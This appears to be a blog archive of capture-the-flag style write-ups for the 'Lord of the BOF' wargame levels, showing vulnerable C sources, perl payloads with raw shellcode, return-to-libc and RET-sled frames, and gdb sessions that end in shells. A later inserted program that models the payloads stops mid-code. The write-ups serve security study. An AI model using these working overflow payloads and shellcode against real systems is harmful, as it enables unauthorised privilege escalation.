30 posts in 'Wargame'

  1. 2014.02.20 iron_golem -> dark_eyes
  2. 2014.02.20 gate -> iron_golem
  3. 2014.02.20 xavius -> death_knight
  4. 2014.02.20 nightmare -> xavius
  5. 2014.02.20 succubus -> nightmare
  6. 2014.02.20 zombie_assassin -> succubus
  7. 2014.02.20 assassin -> zombie_assassin
  8. 2014.02.20 giant -> assassin
  9. 2014.02.20 bugbear -> giant
  10. 2014.02.20 darkknight -> bugbear
[iron_golem@Fedora_1stFloor tmp]$ cat ../dark_eyes.c
/*
     The Lord of the BOF : The Fellowship of the BOF
     - dark_eyes
     - Local BOF on Fedora Core 3
     - hint : RET sleding
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
     char buffer[256];
     char saved_sfp[4];

     if(argc < 2){
          printf("argv error\n");
          exit(0);
     }

     // save sfp
     memcpy(saved_sfp, buffer+264, 4);

     // overflow!!
     strcpy(buffer, argv[1]);

     // restore sfp
     memcpy(buffer+264, saved_sfp, 4);

     printf("%s\n", buffer);
     return 0;
}
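The unchecked copy in dark_eyes.c beside a bounds-checked version, as an added example (my code, not part of the original post or of the LOB challenge sources); copy_arg_checked and run_dark_eyes_hardened are names I chose. It assumes the same 256-byte buffer as the challenge.

```c
/* Added example: dark_eyes.c's copy pattern beside a bounds-checked one.
 * The challenge's save/restore of the 4 bytes at buffer+264 repairs only
 * the saved frame pointer; the return address right after it is still
 * overwritten, so the real fix is refusing over-long input before any copy. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256   /* same buffer size as the challenge program */

/* Result codes returned by copy_arg_checked(). */
enum copy_result { COPY_OK = 0, COPY_TOO_LONG = -1, COPY_BAD_ARGS = -2 };

/* Copy src into dst only if it fits together with its terminating NUL.
 * dst is left untouched on failure, so nothing past its end is written. */
int copy_arg_checked(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return COPY_BAD_ARGS;

    /* Bounded length scan: never read more than dst_size bytes of src. */
    size_t n = 0;
    while (n < dst_size && src[n] != '\0')
        n++;
    if (n == dst_size)           /* no room for the NUL: would overflow */
        return COPY_TOO_LONG;

    memcpy(dst, src, n + 1);     /* n + 1 <= dst_size, copies the NUL too */
    return COPY_OK;
}

/* Hardened equivalent of dark_eyes' main(): same output for well-formed
 * input, a clean rejection (non-zero return) for anything that would
 * overflow the buffer. */
int run_dark_eyes_hardened(int argc, char *argv[])
{
    char buffer[BUF_SIZE];

    if (argc < 2) {
        printf("argv error\n");
        return 1;
    }
    if (copy_arg_checked(buffer, sizeof buffer, argv[1]) != COPY_OK) {
        printf("argv too long (max %d bytes)\n", BUF_SIZE - 1);
        return 2;
    }
    printf("%s\n", buffer);
    return 0;
}

int main(int argc, char *argv[])
{
    return run_dark_eyes_hardened(argc, argv);
}
```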


The hint says to use RET sledding.
By executing RET several times, esp and ebp can be pushed upward.
(Repeated RETs raise esp, and once the new function is entered it does mov %esp,%ebp (esp -> ebp).)

On Fedora Core 3, arguments are referenced relative to EBP.

The address of execl is 0x7a5720.
When the payload was not wrapped in double quotes on both sides, a Segmentation Fault occurred.
As far as I knew, strcpy is not affected by \x20, but the moment I wrapped both sides in double quotes, execl ran normally...;;

"" and NULL seem to be different.
execve

[iron_golem@Fedora_1stFloor ~]$ ./dark_eyes "`perl -e 'print "a"x268,"\xb9\x84\x04\x08"x3,"\x20\x57\x7a\x00"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?燎?퉬퉬 Wz
sh-3.00$ id
uid=502(dark_eyes) gid=502(dark_eyes) groups=501(iron_golem) context=user_u:system_r:unconfined_t
sh-3.00$because of you 


Posted by windowhan
Since this is Fedora Core 3, ASCII-Armor is applied, which makes passing arguments much harder.
So I decided to line up the arguments using the Fake EBP technique or RET.

(gdb) p execl
$1 = {<text variable, no debug info>} 0x7a5720 <execl>

This is the address of the execl function with ASCII-Armor applied.

But according to what Ohyun told me,

./iron_golem `perl -e 'print "a"x264,"\x10\x96\x04\x08","\x23\x57\x7a"'`

you should not build the payload like this.
The approach was to write a shell.c that takes care of spawning the shell, compile it, and then run it via execl from the payload.

=====================================================

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main()
{
     setreuid(geteuid(),geteuid());
     setregid(getegid(),getegid());
     execl("/bin/sh","sh",(char *)0);
     return 0;
}

[gate@Fedora_1stFloor ~]$ ./iron_golem `perl -e 'print "a"x264,"\x10\x96\x04\x08","\x23\x57\x7a"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?#Wz
sh-3.00$ id
uid=501(iron_golem) gid=501(iron_golem) groups=500(gate) context=user_u:system_r:unconfined_t
sh-3.00$ my-pass
euid = 501
blood on the fedora



It's a remote BOF. I dropped in bind shellcode and brute-forced the return address.


LOB20_remotebof_sc_bruteforce.py


Used the fgets temporary buffer space. lol

[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x16,"\xeb\x08\xb8\xe0\x8a\x05\x40\xff\xd0\xf4\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x3b\x70\x61\x73\x73\x3b","\x04\x50\x01\x40"';cat)|./xavius
id
???????????????멘?@奇拗/bin/sh;pass;P@id

Xshellid
/bin/sh: Xshellid: command not found
id
uid=518(nightmare) gid=518(nightmare) euid=519(xavius) egid=519(xavius) groups=518(nightmare)
pass^H^H^H^H^H^Hmy-pass
/bin/shmy-pass: command not found
my-pass
euid = 519
throw me away


[succubus@localhost succubus]$ ./nightmare `perl -e 'print "aaaa"x3,"\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","\x10\x84\x04\x08"x6,"aaaa","\xa0\xfa\xff\xbf","\x7c\xfa\xff\xbf"'`
aaaaaaaaaaaa?@bbbb廈@??????aaaa????
bash$ my-pass
euid = 518
beg for me
bash$


.plt = Procedure Linkage Table
A table through which functions are linked.
Every function the program calls is listed in it.
It is a table created at compile time, and it is already fixed which GOT entry each PLT entry will consult.

When a program calls a library function, the call goes to the operating system's library; since the call and link form can vary with the libc version, the executable stays independent of that by carrying its own small stub for each function in the PLT, which jumps through the corresponding GOT entry.

But here,

/*
        The Lord of the BOF : The Fellowship of the BOF
        - nightmare
        - PLT
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{
        char buffer[40];
        char *addr;
        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }
        // check address
        addr = (char *)&strcpy;
        if(memcmp(argv[1]+44, &addr, 4) != 0){
                printf("You must fall in love with strcpy()\n");
                exit(0);
        }
        // overflow!
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
        // dangerous waterfall
        memset(buffer+40+8, 'A', 4);
        return 0;
}


The "PLT" written at the top of the challenge seems to mean "look up the PLT and study it"; the actual problem was the part that overwrites buffer+48 with AAAA.

Overwriting this part with the data I want, using strcpy, is the win.


[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "a"x44,"\xec\x87\x04\x08","\xbc\x87\x04\x08","\x8c\x87\x04\x08","\x5c\x87\x04\x08","\x24\x87\x04\x08","bbbb","\x58\xfa\xff\xbf","/bin/sh"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?펶??\?$?bbbbX??bin/sh
welcome to the DO!
welcome to the GYE!
welcome to the GUL!
welcome to the YUT!
welcome to the MO!
bash$ my-pass
euid = 517
here to stay
bash$ 


login: assassin
Password:
Last login: Fri Sep  6 14:24:49 from 192.168.232.1
[assassin@localhost assassin]$ bash2                         
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ ls
core  fs  fs.c  zombie_assassin
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵?.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x0 in ?? ()
(gdb) x/1000s 0xbffffb00
(gdb) x/100x 0xbfffffb7
0xbfffffb7:     0x6e697373     0x6e69622f     0x2e3d5f00     0x6d6f7a2f
0xbfffffc7:     0x5f656962     0x61737361     0x6e697373     0x444c4f00
0xbfffffd7:     0x3d445750     0x6d6f682f     0x73612f65     0x73736173
0xbfffffe7:     0x2e006e69     0x6d6f7a2f     0x5f656962     0x61737361
0xbffffff7:     0x6e697373     0x00000000     Cannot access memory at address 0xbfffffff
(gdb) x/100x 0xbffffbf7
0xbffffbf7:     0x61616161     0x40058ae0     0x62626262     0x400fbff9
0xbffffc07:     0x62626262     0x62626262     0x62626262     0x62626262
0xbffffc17:     0x62626262     0x62626262     0xbffffbf3     0x44575000
(gdb) q
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf7\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?
Segmentation fault (core dumped)
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x62626262 in ?? ()
(gdb) q    
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ exit 
exit
Segmentation fault (core dumped)
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ Xq   
sh: Xq: command not found
bash$ exit
exit
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `                  aaaaaaaabbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x62626262 in ?? ()
(gdb) x/100x 0xbffffbf3
0xbffffbf3:     0x61616161     0x61616161     0x62626262     0x400fbff9
0xbffffc03:     0x62626262     0x62626262     0x62626262     0x62626262
0xbffffc13:     0x62626262     0x62626262     0xbffffbf3     0x080484df
(gdb) x/x 0xbffffbf3
0xbffffbf3:     0x61616161
(gdb)
0xbffffbf7:     0x61616161
(gdb)
0xbffffbfb:     0x62626262
(gdb)
0xbffffbff:     0x400fbff9
(gdb) x/x 0xbffffbf3+4
0xbffffbf7:     0x61616161
(gdb)
0xbffffbfb:     0x62626262
(gdb)
0xbffffbff:     0x400fbff9
(gdb)
0xbffffc03:     0x62626262
(gdb) q  
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ id   
uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)
bash$ my-pass
euid = 516
no place to hide
bash$



Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

I don't remember exactly, but I think I solved it with RET sledding...

Program received signal SIGSEGV, Segmentation fault.
0x0 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
c…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x36'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x36'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
co…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
co…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`


Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x1000 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`


Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x1000 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x45'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x45'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`


Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffffd00 in ?? ()
(gdb) x/100x 0xbffffd00
(gdb) x/100x 0xbffffd00-100
0xbffffc9c:     0x8969622f      0xb0c189e3      0x5351520b      0x80cde189
(gdb) x/100x 0xbffffd00-300
0xbffffbd4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbe4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbf4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc04:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc14:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc24:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc34:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc44:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc54:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc64:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc74:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc84:     0x90909090      0x90909090      0x90909090      0xc289c031
0xbffffc94:     0x2f6e6850      0x2f686873      0x8969622f      0xb0c189e3
0xbffffca4:     0x5351520b      0x80cde189      0x53454c00      0x45504f53
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
c…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffffd00 in ?? ()
(gdb) q
The program is running.  Exit anyway? (y or n) y
[giant@localhost tmp]$
[giant@localhost tmp]$ r `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
bash: r: command not found
[giant@localhost tmp]$ bash2
[giant@localhost tmp]$ ./assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`

bash$ id
uid=514(giant) gid=514(giant) groups=514(giant)
bash$ q
sh: q: command not found
bash$ exit
exit
[giant@localhost tmp]$ cd ../
[giant@localhost giant]$ ls
assassin  assassin.c  tmp
[giant@localhost giant]$ finger
Login     Name       Tty      Idle  Login Time   Office     Office Phone
giant                pts/0          Jul 30 18:48 (192.168.222.1)
[giant@localhost giant]$ ./assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`

bash$ id
uid=514(giant) gid=514(giant) euid=515(assassin) egid=515(assassin) groups=514(giant)
bash$ my-pass
euid = 515
pushing me away
bash$


Other posts in the 'Wargame > LOB (Redhat9)' category

zombie_assassin -> succubus  (0) 2014.02.20
assassin -> zombie_assassin  (0) 2014.02.20
bugbear -> giant  (0) 2014.02.20
darkknight -> bugbear  (0) 2014.02.20
golem -> darkknight  (0) 2014.02.20
Posted by windowhan

The problem is as follows.


[bugbear@localhost tmp]$ cat ../giant.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - giant
        - RTL2
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

main(int argc, char *argv[])
{
        char buffer[40];
        FILE *fp;
        char *lib_addr, *execve_offset, *execve_addr;
        char *ret;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // gain address of execve
        fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "(%x)", &lib_addr);
        fclose(fp);

        fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "%x", &execve_offset);
        fclose(fp);

        execve_addr = lib_addr + (int)execve_offset;
        // end

        memcpy(&ret, &(argv[1][44]), 4);
        if(ret != execve_addr)
        {
                printf("You must use execve!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}

Here only the execve function may be used: the program recomputes execve's address from ldd and nm and refuses to run unless argv[1][44..47] is exactly that address.

To set up the arguments for execve you need execve(path, argv, envp): the path of the program to run, a pointer to a NULL-terminated array of argument strings (whose first entry is conventionally that path again), and an environment pointer (Linux accepts NULL here and treats it as an empty environment).

In other words, something like execve("/bin/sh", {&"/bin/sh", NULL}, 0) is needed: the second argument has to point at memory that holds the address of the "/bin/sh" string followed by a 4-byte zero.
At first I tried putting the address of /bin/sh into an environment variable called R and a huge run of null bytes into one called R2.

0xbffffdca:      "R2="
0xbffffdce:      "USER=bugbear"
0xbffffddb:      "BASH_ENV=/home/bugbear/.bashrc"
0xbffffdfa:      "LANG=en_US"
0xbffffe05:      "R=u¿\017@"
0xbffffe0c:      "OSTYPE=Linux"
0xbffffe19:      "SHLVL=1"

But the address where the variable ended up was completely different from what I had intended.
On top of that I tried building the payload with Z, the last letter of the alphabet, so that the variable would sit right next to the nulls,
but that was a mistake on my part.
I had assumed there would be null bytes in between, but something else was there.

0xbffffe12:      "Z=u¿\017@"
0xbffffe19:      "SHLVL=1"
0xbffffe21:      "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffee9:      ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbfffffb1:      "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbfffffe4:      "/home/bugbear/tmp/giant"
0xbffffffc:      ""

So what I decided to use instead was argv.
The path the program was executed with (argv[0]) is also left behind at the very top of the stack, right below the terminating zero word,

like 0xbfffffe4: "/home/bugbear/tmp/giant" above.
Deliberately rename the file so that its name is the 4 bytes of the address of the "/bin/sh" string, then build execve's arguments with a pointer to where those 4 bytes end up in that string.

And for execve's argument setup a null has to follow immediately: the string's terminating NUL and the zero word behind it are exactly what argv[1] and envp[0] must be, which is why the payload below passes 0xbffffff7 (the 4 name bytes) as argv and 0xbffffffc (the zero word) as envp.

./`perl -e 'print "\xf9\xbf\x0f\x40"'` "`perl -e 'print "\x48\x9d\x0a\x40"x12,"\xe0\x91\x03\x40","\xf9\xbf\x0f\x40","\xf7\xff\xff\xbf","\xfc\xff\xff\xbf"'`"
  


Posted by windowhan

This was a basic RTL (return-to-libc) problem.

Difficulty-wise it is even easier than the previous one, haha.

I used the system function.


문제는 다음과 같다.


[darkknight@localhost darkknight]$ cat bugbear.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - bugbear
        - RTL1
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] == '\xbf')
        {
                printf("stack betrayed you!!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}


The source used to find the "/bin/sh" string inside libc is as follows (it walks forward from system()'s address in the running process, so it has to be compiled and run on the target box):


#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
       long shell;
       shell = 0x40058ae0; // start at the address of system(); "/bin/sh" lives in libc above it

       // step one byte at a time until the 8 bytes "/bin/sh\0" are found
       while(memcmp((void *)shell, "/bin/sh", 8)) shell++;
       printf("\"/bin/sh\" is at 0x%lx\n", shell);
       return 0;
}




[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "\xe0\x8a\x05\x40"x12,"aaaa","\xf9\xbf\x0f\x40"'`
?@?@?@?@?@?@?@?@?@?@?@?@aaaa廈@
bash$ id
uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight)
bash$ my-pass
euid = 513
new divide

Because the box is Redhat 6.2, the /bin/sh that system() spawns does not drop the effective uid (there is no getuid()-style check on that path, unlike on newer systems), so system() could be used here.
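The two frames used in these write-ups (bugbear's system() frame with its 0xbf filter, and giant's execve() frame that relies on the exec path string at the top of the stack) can be modelled offline. The program below is an added example written for this page, not code from the LOB levels or from the original posts. It reuses the addresses quoted above (system 0x40058ae0, execve 0x400a9d48, "/bin/sh" 0x400fbff9) and assumes the user stack ends at 0xc0000000 with a 4-byte zero word just below it, which is consistent with the `0xbffffffc: ""` line in the dump; the 64-byte stack model, the function names and the hypothetical stack return address 0xbffffd00 are this example's own. It builds each payload, runs the same checks the two binaries perform, and verifies that the pointers in giant's payload resolve to argv = {&"/bin/sh", NULL} and envp = {NULL} whether the binary is launched as ./<name> or through the full directory path the shell expands it to.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Addresses quoted in the write-ups (LOB Redhat 6.2 box, libc mapped at 0x40xxxxxx). */
#define SYSTEM_ADDR 0x40058ae0u  /* system() */
#define EXECVE_ADDR 0x400a9d48u  /* execve(), what giant derives from ldd + nm */
#define BINSH_ADDR  0x400fbff9u  /* "/bin/sh" inside libc */
#define RET_OFF     44           /* buffer[40] + saved ebp: offset of main's return address */
#define STACK_TOP   0xc0000000u  /* assumption: end of the user stack on this box */

static void put32(uint8_t *p, uint32_t v) {   /* little-endian store */
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
static uint32_t get32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Return-to-libc frame for a main() whose return address is 44 bytes into argv[1]:
 * [0..43] filler, [44] function to return into, [48] that function's return address,
 * [52..] its arguments. The filler is the function address repeated, like the "x12"
 * in the perl one-liners. Returns the payload length. */
size_t rtl_frame(uint8_t *out, uint32_t func, uint32_t fake_ret, const uint32_t *args, size_t nargs) {
    size_t i;
    for (i = 0; i <= RET_OFF; i += 4) put32(out + i, func);
    put32(out + RET_OFF + 4, fake_ret);
    for (i = 0; i < nargs; i++) put32(out + RET_OFF + 8 + 4 * i, args[i]);
    return RET_OFF + 8 + 4 * nargs;
}

/* bugbear's filter: argv[1][47] == 0xbf means the return address points into the stack. */
int bugbear_accepts(const uint8_t *payload) { return payload[47] != 0xbf; }

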